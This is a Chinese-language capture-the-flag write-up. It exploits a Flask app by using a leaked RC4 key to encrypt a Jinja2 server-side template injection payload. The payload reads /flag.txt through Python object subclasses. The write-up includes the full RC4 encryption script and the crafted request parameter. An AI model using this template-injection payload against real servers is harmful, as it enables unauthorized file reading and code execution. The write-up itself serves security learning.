進入題目頁面只有個Welcome To Find Secret,最后發現了/secret目錄。
在/secret目錄中得到Tell me your secret.I will encrypt it so others can't see。
順着題目說的做,嘗試傳遞secret參數。
發現如題目所說的,發送的內容加密了,但是不知道怎么加密了。
修改參數的值進行盲測,發現如果傳入的字符串達到一定長度會報錯:
直接在網頁端進入報錯頁面,發現是flask的報錯,顯示了部分源碼。可以看到是flask,python版本是2.7。
這里的加密算法使用的是RC4,密鑰泄漏了。將所發送內容解密之后會被渲染,因此考慮到可能存在模版注入。
在網上找了一個RC4加密腳本,再次基礎上輸入密鑰並嘗試文件讀取。
import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
# print("RC4加密主函數")
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256)) # 我這里沒管秘鑰小於256的情況,小於256不斷重復填充即可
# print("原來的 s 盒:%s" % s_box)
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
# print("混亂后的 s 盒:%s"% s_box)
return s_box
def rc4_excrypt(plain, box):
# print("調用加密程序成功。")
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
# print("res用於加密字符串,加密后是:%res" %res)
cipher = "".join(res)
print("加密后的字符串是:%s" %quote(cipher))
#print("加密后的輸出(經過編碼):")
#print(str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
腳本中使用的模版注入payload為
{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}
運行腳本得到需要傳遞的參數為
.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92
不知道為啥,他的safe函數形同虛設,盡管提示了禁止的東西,但是還是沒啥用。
做這個題蠻巧合的,傳參數的時候打算放棄了,結果輸着輸着就報錯了,這才有了后面的過程。